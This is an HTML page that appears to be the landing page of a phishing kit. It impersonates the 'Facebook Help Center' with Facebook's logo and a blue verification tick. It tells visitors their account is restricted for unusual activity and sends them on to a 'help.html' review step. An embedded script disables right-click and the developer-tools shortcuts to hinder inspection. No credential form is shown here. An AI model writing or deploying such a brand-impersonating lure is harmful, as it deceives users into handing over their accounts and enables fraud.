<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Facebook Help Center</title>
    <link id="png240" rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" type="icon"/>
    <link rel="stylesheet" href="design.css">
</head>
<body>

<div class="container">

    <div class="dd"><img src="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" width="100" alt="logo"></div>
    <h2>Facebook Help Center</h2>
    <img src="https://cdn.glitch.global/0e876aa8-70cf-40f1-951b-94c8002e5dcc/thumbnails%2Fbluetick.png?1699082922610" width="25" >

    <p>We have detetcted an unusual activity and post to your account.<br>So, your account is restricted from some freatures, </p>
    <p>you can submit a request for review.</p> <br>

    <a href="help.html" class="action">Continue</a>
   
</div>

<script>
    document.addEventListener('contextmenu', function(e) {
        e.preventDefault();
    });
    document.onkeydown = function(e) {
        if (e.ctrlKey && (e.shiftKey || e.key === "I" || e.key === "i")) {
            e.preventDefault();
        }
    };
</script>

</body>
</html>
